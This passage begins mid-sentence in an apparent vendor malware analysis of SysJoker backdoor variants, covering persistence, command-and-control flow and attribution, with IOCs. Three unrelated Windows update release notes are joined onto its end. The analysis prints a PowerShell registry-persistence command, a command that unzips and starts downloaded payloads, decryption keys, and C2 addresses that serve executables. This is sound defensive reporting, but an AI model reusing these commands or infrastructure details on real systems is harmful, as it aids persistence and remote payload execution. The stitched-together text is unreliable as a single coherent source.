enough to stay under the radar. As we investigated the newer variants of SysJoker that were utilized in targeted attacks in 2023, we also discovered a variant written in Rust, which suggests the malware code was completely rewritten. In addition, we also uncovered behavioral similarities with another campaign named Operation Electric Powder which targeted Israel in 2016-2017. This campaign was previously linked to Gaza Cybergang (aka Molerats), a threat actor operating in conjunction with Palestinian interests. In this article, we drill down into the Rust version of SysJoker, as well as disclose additional information on other SysJoker Windows variants and their attribution. Rust SysJoker Variant The SysJoker variant (9416d7dc2ecdeda92ba35cd5e54eb044), written in Rust, was submitted to VirusTotal with the name php-cgi.exe on October 12, 2023. Compiled a few months earlier on August 7, it contains the following PDB path: C:\Code\Rust\RustDown-Belal\target\release\deps\RustDown.pdb. The malware employs random sleep intervals at various stages of its execution, which may serve as possible anti-sandbox or anti-analysis measures. The sample has two modes of operation which are determined by its presence in a particular path. This is intended to differentiate the first execution from any subsequent ones based on persistence. First, it checks whether the current running module matches the path C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe. Based on the outcome the malware proceeds to one of the two possible stages. First execution If the sample runs from a different location, indicating it’s the first time the sample is executed, the malware copies itself to the path C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe and then runs itself from the newly created path using PowerShell with the following parameter: -Command C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe Finally, it creates a persistence mechanism and then exits the program. Persistence is established in an unusual way, using PowerShell with the following argument: -Command "$reg=[WMIClass]'ROOT\DEFAULT:StdRegProv'; $results=$reg.SetStringValue('&amp;H80000001','Software\Microsoft\Windows\CurrentVersion\Run', 'php-cgi', 'C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe');" Eventually, this PowerShell code creates a registry Run key in the HKEY_CURRENT_USER hive, which points to the copy of the executable, using the WMI StdRegPro class instead of directly accessing the registry via the Windows API or reg.exe. Subsequent executions (from persistence) SysJoker contacts a URL on OneDrive to retrieve the C2 server address. The URL is hardcoded and encrypted inside the binary: https://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112&amp;authkey=!AED7TeCJaC7JNVQ The response must should contain also a XOR-encrypted blob of data that is encoded in base64. During our investigation, the following response was received: KnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr After decryption, the C2 IP address and port are revealed: {"url":"http://85.31.231[.]49:443"} Using OneDrive allows the attackers to easily change the C2 address, which enables them to stay ahead of different reputation-based services. This behavior remains consistent across different versions of SysJoker. The malware collects information about the infected system, including the Windows version, username, MAC address, and various other data. This information is then sent to the /api/attach API endpoint on the C2 server, and in response it receives a unique token that serves as an identifier when the malware communicates with the C2: Figure 1 – Bot registration api call. After registration with the C2 server, the sample runs the main C2 loop. It sends a POST request containing the unique token to the /api/req endpoint, and the C2 responds with JSON data: Figure 2 – Command request and response. The expected response from the server is a JSON that contains a field named data that contains an array of actions for the sample to execute. Each array consists of id and request fields. The request field is another JSON with fields called url and name. An example of the response from the server: {"data":[{"id":"1", "request":"{"url": "http://85.31.231[.]49/archive_path", "name":"mal_1.exe"}"}, {"id":"2", "request":"{"url": "http://85.31.231[.]49/archive_path", "name":"mal_2.exe"}"}]} The malware downloads a zip archive from the URL specified in the url field. The archive contains an executable that after unzipping is saved as the name field into C:\ProgramData\php-Win32-libs folder. The archive is unzipped using the following PowerShell command: powershell -Command Expand-Archive -Path C:\ProgramData\php-Win32-libs\XMfmF.zip -DestinationPath C:\ProgramData\php-Win32-libs ; start C:\ProgramData\php-Win32-libs\exe_name.exe It is important to mention that in previous SysJoker operations, the malware also had the ability not only to download and execute remote files from an archive but also to execute commands dictated by the operators. This functionality is missing in the Rust version. After receiving and executing the file download command, depending on whether the operation was successful or not, the malware contacts the C2 server again and send a success or exception message to the path /api/req/res. The server sends back a JSON confirmation indicating that it has received the information: {"status":"success"}. Encryption The malware has two methods for string decryption. The first method is simple and appears across multiple SysJoker variants. The sample contains several base64-encoded encrypted data blobs and a base64-encoded key. Upon decryption, both blobs are base64-decoded and then XORed to produce the plain text strings. The second encryption method is tedious and is spliced in-line throughout the program repeatedly at compile time. This generates a complex string decryption algorithm throughout the sample. Figure 3 – Example of the decryption of the string “php-”. Windows SysJoker Variants In addition to the newly found Rust variant, we uncovered two more SysJoker samples that were not publicly exposed in the past. Both of these samples are slightly more complex than the Rust version or any of the previously analyzed samples, possibly due to the public discovery and analysis of the malware. One of these samples, in contrast to other versions, has a multi-stage execution flow, consisting of a downloader, an installer, and a separate payload DLL. DMADevice variant The DMADevice sample (d51e617fe1c1962801ad5332163717bb) was compiled in May 2022, a few months after SysJoker was first uncovered. Like other versions, the malware starts by retrieving the C2 server address by contacting the URL: https://onedrive.live[.]com/download?cid=F6A7DCE38A4B8570&amp;resid=F6A7DCE38A4B8570!115&amp;authkey=AKcf8zLcDneJZHw The OneDrive link responds with an encrypted base64-encoded string, which is decrypted with the XOR key QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT. This is the same key that is used in the Rust version. The decrypted blob contains a JSON with the C2 domain in the following format: {"url":"http://sharing-u-file[.]com"} Next, the malware proceeds to the three-stage execution process. 1. Setup files and persistence The sample generates a unique bot ID, sends it in a POST request to the /api/cc API endpoint, and receives back the JSON describing the desired malware setup on the infected machine. The JSON has the following structure: {"key":"f57d611b-0779-4125-a3e8-4f8ca3116509","pi":"VwUD[REDACTED]","data":"PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVRJZQU0RdXx3cVVPD1ZSRhoTdS9sY1hbTFldXlx8QwIRSRppeSdrDA1GRVhZW3lXBRtSHFMTHUBpfXZkVkFBRVtaQyhdBhZJWAoaT0NDXkZTR0NRA1lbSlNJVEABElRaXQ8YE11FSA8RSRpeQAdKF0MfE20ZVhBrI3IXJXJ1ESpmc2JrZX57d2ZibDN2OWRgXQVKDBJcV0VqaWdQCFFYE0VtbSFYQkVSV1liVEBGRA5dOWR\/QQgYP05lEx0UaR9NRmdyI2lia0JxH3MVFQ8aVEpQD00RQV1DQlxNEARBX1BbUBBFRnpCEBt3WA5IEBpyV05bVVtbSkEUEExLDEEYREMfE2J5c2RuJ2dyOGp8WAFfX0RYX1lobWVcQwVcEktxaCVNERNWX0VgUEJKD1pZOGpjRAwPbQ=="} The field key in the JSON is used to XOR-decrypt the other fields after they are base64-decoded: the pi field contains the victim’s IP address and the data field contains the array with multiple values: ["SystemDrive","ProgramData","DMADevice","DMASolutionInc","DMASolutionInc.exe","DMASolutionInc.dll","powershell.exe","cmd","open","start","\/c REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \/V","\/t REG_SZ \/D",".exe","$env:username | Out-File -Encoding 'utf8' '","SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"] Those values are utilized in the following order: SystemDrive – Get the system hard drive letter. ProgramData – Create these two folders under the specified (in this case, ProgramData) folder: – DMADevice – The first folder name created. – DMASolutionInc.exe – The file name used by the currently running executable to self-replicate into the DMADevice folder. DMASolutionInc.dll – The name of the config file. DMASolutionInc – The second folder name created. The rest of the values are used in a few commands that establish persistence via the registry Run key and retrieve the current user name from $env into the temporary txt file. The config file, in our case DMASolutionInc.dll, is stored on a disk encrypted (using the same key used to decrypt the domain) and base64-encoded. It contains encrypted JSON with the following fields: {"id":"[BOT-ID]","us":"[USERNAME]","ip":"[IP]"} After performing all these operations, the sample executes its copy from DMASolutionInc.exe and exits. 2. Register with the C2 server When the sample is executed again (via persistence from the previous stage), it checks the location it is running from. It then continues the execution by making a POST request to /api/add containing the uuid, user name, and user token, which is also generated by the malware: uuid=bot-id&nu=username&user_token=token The server responds with a token generated on its side which is then used for all the subsequent C2 requests. 3. C2 main loop The token received during the previous stage is used for making POST requests to /api/cr on the C2 server to retrieve the commands to execute. Similar to other SysJoker variants, the server responds with a JSON that contains field data which is an array of actions to take. This version can download and execute files or run commands and upload the results to the C2 server. For each command in the array, the sample sends a response reporting if it was successful or not. AppMessagingRegistrar variant This variant has a compilation timestamp of June 2022 and has a quite different execution flow. The functionality of the malware is divided into two separate components: a downloader (DDN, c2848b4e34b45e095bd8e764ca1a4fdd) and a backdoor (AppMessagingRegistrar, 31c2813c1fb1e42b85014b2fc3fe0666). DDN Downloader The threat actors first deliver a lightweight downloader. It creates the folder C:\ProgramData\NuGet Library\, then downloads a zip file from https://filestorage-short[.]org/drive/AppMessagingRegistrar.zip . It unzips the file, copies it into the AppMessagingRegistrar.exe file and then executes it. Splitting the functionality into separate components has proved effective: at the time of the first submission to VirusTotal (VT), the malware was not detected by any of the platform’s engines: Figure 4 – DNN downloader with 0 detections on its first submission to VT (2023-04-09). AppMessagingRegistratar Upon execution, this payload first checks the registry key SOFTWARE\Intel\UNP\ProgramUpdates\UUID for the UUID of the PC. If the registry key is not available, a UUID is generated using the UuidCreate function and is then saved to the previously mentioned key. Figure 5 – Uuid Generation. The variant then proceeds to decrypt a hardcoded OneDrive URL to retrieve a C2 address. The XOR key in this sample is 22GC18YH0N4RUE0BSJOAVW24624ULHIQGS4Y1BQQUZYTENJN2GBERQBFKF2W78H7. After the C2 address is decrypted, a POST request is made to the C2 server API endpoint /api/register which contains the previously generated UUID. The server responds with a JSON containing a token and a status message: {"status": "success", "token":"[TOKEN]", "status_num":1} The status indicates if the request was valid or not, and the samples check specifically for the string “success”. The token is used for all the following C2 requests but unlike all the other samples, instead of using the body of requests, it is sent in the Authorization header: Authorization: Bearer [TOKEN]. This change could be to accommodate additional flows in the malware execution (discussed below) in which the malware sends a GET request instead of a POST and requires a mechanism for the server to identify the sender. The status_num field is used as a global flag to indicate what actions the bot should take. There are four statuses available: Status Number Action Description 0 Setup Download MsoftInit.dll and execute the init and step exports. 1 Idle loop Wait for status_num to change. 3 Payload retrieval Download and save MsoftNotify.dll DLL. 4 Payload execution Execute MsoftNotify.dll DLL. Setup phase If the received status_num is 0, the malware creates the C:\ProgramData\Intel\UNP\ProgramUpdates and C:\ProgramData\Intel\Drivers\MsoftUpdates folders. It then proceeds to: Download a DLL file using the function UrlDownloadToFileW from the path /api/library/[TOKEN] and save it to C:\ProgramData\Intel\Drivers\MsoftUpdates\MsoftInit.dll. Load the MsoftInit.dll and call the init exported function. Load the same DLL again and call the step exported function. The exact purpose of those functions is unknown as we were not able to retrieve the DLL. However, due to the names and our analysis of previous versions of the malware, we believe they were part of the persistence and setup process. Finally, the malware sends an empty POST request to the API endpoint /api/update. The expected response from the server is an empty JSON. Idle loop If the status_num is 1, the malware continues to make requests to the C2 API endpoint /api/status in an infinite loop. To break the loop, the status_num must change. Main payload download If the status_num is 3, the malware proceeds to download a DLL file from URL /api/library/[TOKEN] and saves it to the path C:\ProgramData\Intel\Drivers\MsoftUpdates\MsoftNotify.dll. It then sends a request to the C2 API endpoint /api/ready: if the server responds with a status success, the status flag is then set to 4. Payload execution If the status is 4, the malware proceeds to make a GET request to the C2 API endpoint /api/requests. The C2 server responds with a JSON with 3 parameters, id, r, and k. The malware then loads the MsoftNotify.dll DLL and resolves the function st. The r and k values sent from the server are used by st as parameters. We were not able to retrieve the DLL, but based on the previous versions, this is likely a version of the main command running functionality for the backdoor, and its return value should be a string. After the function runs and returns a result, the id received in the token is used in the POST request to the C2 which contains the output: POST /api/requests/[ID] HTTP/1.1 Host: [62.108.40.129](https://www.virustotal.com/gui/url/79fde5d4b19cbd1f920535215c558b6ff63973b7af7d6bd488e256821711e0b1) Accept: application/json Authorization: Bearer [TOKEN] Content-Length: 15 Content-Type: application/x-www-form-urlencoded response=[EXECUTION OUTPUT] Infrastructure The infrastructure used in this campaign is configured dynamically. First, the malware contacts a OneDrive address, and from there, it decrypts the JSON containing the C2 address with which to communicate. The C2 address is encrypted with a hardcoded XOR key and base64-encoded. This threat actor commonly uses cloud storage services. Previous reports show Google Drive was used for the same purpose. Figure 6 – Metadata of OneDrive file containing the encrypted C2 server. Ties to Operation Electric Powder The SysJoker backdoor uses its own custom encryption for three main strings: the OneDrive URL containing the final C2 address, the C2 address received from the request to OneDrive, and a PowerShell command used for persistence: $reg=[WMIClass]'ROOT\DEFAULT:StdRegProv'; $results=$reg.SetStringValue('&H80000001','Software\Microsoft\Windows\CurrentVersion\Run'[TRUNCATED] This PowerShell command based on the StdRegProv WMI class is quite unique. It is shared between multiple variants of SysJoker and only appears to be shared with one other campaign, associated with Operation Electric Powder previously reported by ClearSky. The 2017 report describes the persistent activity carried out in 2016-2017 against the Israel Electric Company (IEC). This operation used phishing and fake Facebook pages to deliver both Windows and Android malware. Windows malware used in this campaign consisted of a dropper, a main backdoor, and a Python-based keylogging and screen-grabbing module. Throughout our analysis of the SysJoker operation, we saw indications suggesting that the same actor is responsible for both attacks, despite the large time gap between the operations. Both campaigns used API-themed URLs and implemented script commands in a similar fashion. This includes the Run registry value but is not the only common factor. For example, the following image shows the similarities between the commands used by different malware when gathering recon data from the infected device to temporary text files: Figure 7 – Use of the type command in Electric Powder → the original SysJoker → DMADevice SysJoker variant. Conclusion Although the SysJoker malware, which was first seen in 2021 and publicly described in 2022, wasn’t attributed to any known actor, we found evidence that this tool and its newer variants have been used as part of the Israeli-Hamas conflict. We were also able to make a connection between SysJoker and the 2016-2017 Electric Powder Operation against Israel Electric Company. In our report, we described the evolution of the malware and the changes in the complexity of its execution flow, as well as its latest shift to the Rust language and the latest infrastructure it uses. The earlier versions of the malware were coded in C++. Since there is no straightforward method to port that code to Rust, it suggests that the malware underwent a complete rewrite and may potentially serve as a foundation for future changes and improvements. Check Point Customers Remain Protected Check Point Customers remain protected against attacks detailed in this report, while using Check Point Anti-Bot, Harmony Endpoint and Threat Emulation. Threat Emulation Backdoor.Wins.Sysjoker.ta.R Backdoor.Wins.Sysjoker.ta.Q Backdoor.Wins.Sysjoker.ta.P Backdoor.Wins.Sysjoker.ta.O Backdoor.Wins.Sysjoker.ta.N Backdoor.Wins.Sysjoker.ta.M Backdoor.Wins.Sysjoker.ta.L Harmony Endpoint Backdoor.Win.SysJoker.H Check Point Anti-Bot Backdoor.WIN32.SysJoker.A Backdoor.WIN32.SysJoker.B Backdoor.WIN32.SysJoker.C IOCs Infrastructure 85.31.231[.]49 sharing-u-file[.]com filestorage-short[.]org audiosound-visual[.]com 62.108.40[.]129 Hashes d4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e72 6c8471e8c37e0a3d608184147f89d81d62f9442541a04d15d9ead0b3e0862d95 e076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e9239836 96dc31cf0f9e7e59b4e00627f9c7f7a8cac3b8f4338b27d713b0aaf6abacfe6f 67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc706 0ff6ff167c71b86c511c36cba8f75d1d5209710907a807667f97ce323df9c4ba

November 14, 2023—KB5032196 (OS Build 17763.5122) Win 10 Ent LTSC 2019 Win 10 IoT Ent LTSC 2019 Windows 10 IoT Core 2019 LTSC Windows Server 2019 Release Date: 11/14/2023 Version: OS Build 17763.5122 11/17/20 For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page. Highlights This update supports the currency change in Croatia from the Kuna to the Euro. This update addresses security issues for your Windows operating system. Improvements This security update includes improvements. When you install this KB: This update supports daylight saving time (DST) changes in Syria. To learn more, see Interim guidance for Syria DST changes 2022. This update affects user mode printer drivers. They unload unexpectedly. This occurs when you print from multiple print queues to the same printer driver. This update addresses an issue that affects Xenon or Argon containers. They do not start. This update addresses an issue that affects NCryptGetProperty(). Calling it with NCRYPT_KEY_TYPE_PROPERTY returns 0x1 instead of 0x20. This occurs when the key is a machine key. This update includes quarterly changes to the Windows Kernel Vulnerable Driver Blocklist file, DriverSiPolicy.p7b. It adds to the list of drivers that are at risk for Bring Your Own Vulnerable Driver (BYOVD) attacks. This update addresses an issue that affects Windows LAPS. Its PasswordExpirationProtectionEnabled policy fails to turn on the setting. This update addresses an issue that affects an Application Virtualization (App-V) environment. Copy operations within it stop working. This occurs after you install the April 2023 update. If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the new Security Update Guide website and the November 2023 Security Updates. Windows 10 servicing stack update - 17763.5084 This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. Known issues in this update Symptom Workaround Using the FixedDrivesEncryptionType or SystemDrivesEncryptionType policy settings in the BitLocker configuration service provider (CSP) node in mobile device management (MDM) apps might incorrectly show a 65000 error in the "Require Device Encryption" setting for some devices in your environment. Affected environments are those with the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies set to enabled and selecting either "full encryption" or "used space only". Microsoft Intune is affected by this issue but third-party MDMs might also pe affected. Important This issue is a reporting issue only and does not affect drive encryption or the reporting of other issues on the device, including other BitLocker issues. To mitigate this issue in Microsoft Intune, you can set the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies to not configured. We are working on a resolution and will provide an update in an upcoming release. How to get this update Before installing this update Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. Prerequisite: You must install the August 10, 2021 SSU (KB5005112) before installing the LCU. Install this update Release Channel Available Next Step Windows Update and Microsoft Update Yes None. This update will be downloaded and installed automatically from Windows Update. Windows Update for Business Yes None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. Microsoft Update Catalog Yes To get the standalone package for this update, go to the Microsoft Update Catalog website. Windows Server Update Services (WSUS) Yes This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10 Classification: Security Updates If you want to remove the LCU To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages. Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation. File information For a list of the files that are provided in this update, download the file information for cumulative update 5032196. For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.5084.

November 14, 2023—KB5032197 (OS Build 14393.6452) Windows 10, version 1607, all editions Windows Server 2016, all editions Release Date: 11/14/2023 Version: OS Build 14393.6452 11/19/20 For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1607, see its update history page. Highlights This update addresses security issues for your Windows operating system. Improvements This security update includes quality improvements. When you install this KB: This update supports daylight saving time (DST) changes in Syria. To learn more, see Interim guidance for Syria DST changes 2022. If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the new Security Update Guide website and the November 2023 Security Updates. Known issues in this update Microsoft is not currently aware of any issues with this update. How to get this update Before installing this update Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. If you are using Windows Update, the latest SSU (KB5032391) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog. Install this update Release Channel Available Next Step Windows Update and Microsoft Update Yes None. This update will be downloaded and installed automatically from Windows Update. Windows Update for Business Yes None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. Microsoft Update Catalog Yes To get the standalone package for this update, go to the Microsoft Update Catalog website. Windows Server Update Services (WSUS) Yes This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Windows 10 Classification: Security Updates File information For a list of the files that are provided in this update, download the file information for cumulative update 5032197.

November 14, 2023—KB5032198 (OS Build 20348.2113) Windows Server 2022 Release Date: 14/11/2023 Version: OS Build 20348.2113 For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows Server 2022, see its update history page. Note Follow @WindowsUpdate to find out when new content is published to the Windows release health dashboard. Improvements This security update includes quality improvements. When you install this KB: This update supports daylight saving time (DST) changes in Syria. To learn more, see Interim guidance for Syria DST changes 2022. This update addresses an issue that affects UI Automation and caching mode. This update affects Windows Autopilot profiles. The process to download the Windows Autopilot policy is more resilient. This helps when a network connection might not be fully initialized. This update increases the retry attempts when you try to download the Windows Autopilot profile. This update addresses an issue that causes your device to restart when you do not expect it. This occurs after you restore a system. This update affects user mode printer drivers. They unload unexpectedly. This occurs when you print from multiple print queues to the same printer driver. This update addresses an issue that affects Xenon or Argon containers. They do not start. This update affects Windows Server: Azure Edition. It is easier to view attestation failure notifications. This update addresses an issue that affects an Application Virtualization (App-V) environment. Copy operations within it stop working. This occurs after you install the April 2023 update. This update addresses an issue that blocks external connections. This occurs when you set up a Kubernetes load balanced service and turn on session affinity. This update addresses an issue that affects NCryptGetProperty(). Calling it with NCRYPT_KEY_TYPE_PROPERTY returns 0x1 instead of 0x20. This occurs when the key is a machine key. This update includes quarterly changes to the Windows Kernel Vulnerable Driver Blocklist file, DriverSiPolicy.p7b. It adds to the list of drivers that are at risk for Bring Your Own Vulnerable Driver (BYOVD) attacks. This update addresses an issue that affects Windows LAPS. Its PasswordExpirationProtectionEnabled policy fails to turn on the setting. This update addresses an issue that affects the refsutil.exe inbox utility. Options, like salvage and leak, do not work well on Resilient File System (ReFS) volumes. This update addresses an issue that might affect a large reparse point. You might get a stop error when you use NTFS to access it. This issue occurs after a canceled FSCTL Set operation changes the reparse tag. This update addresses an issue that affects a machine that is used as a remote desktop session (RDS) host. An RDR_FILE_SYSTEM (0x27) stop error occurs. Because of this, everyone that uses RDS starts up from this machine. This update addresses a known issue that affects virtual machines (VMs) that run on VMware ESXi hosts. Windows Server 2022 might fail to start up. The affected VMs will receive an error with a blue screen and a stop code: PNP DETECTED FATAL ERROR. If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the Security Update Guide and the November 2023 Security Updates. Windows Server 2022 servicing stack update - 20348.2084 This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. Known issues in this update Microsoft is not currently aware of any issues with this update. How to get this update Before installing this update Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions. Install this update Release Channel Available Next Step Windows Update and Microsoft Update Yes None. This update will be downloaded and installed automatically from Windows Update. Windows Update for Business Yes None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. Microsoft Update Catalog Yes To get the standalone package for this update, go to the Microsoft Update Catalog website. Windows Server Update Services (WSUS) Yes This update will automatically sync with WSUS if you configure Products and Classifications as follows: Product: Microsoft Server operating system-21H2 Classification: Security Updates If you want to remove the LCU To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages. Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation. File Information For a list of the files that are provided in this update, download the file information for cumulative update 5032198. For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 20348.2084.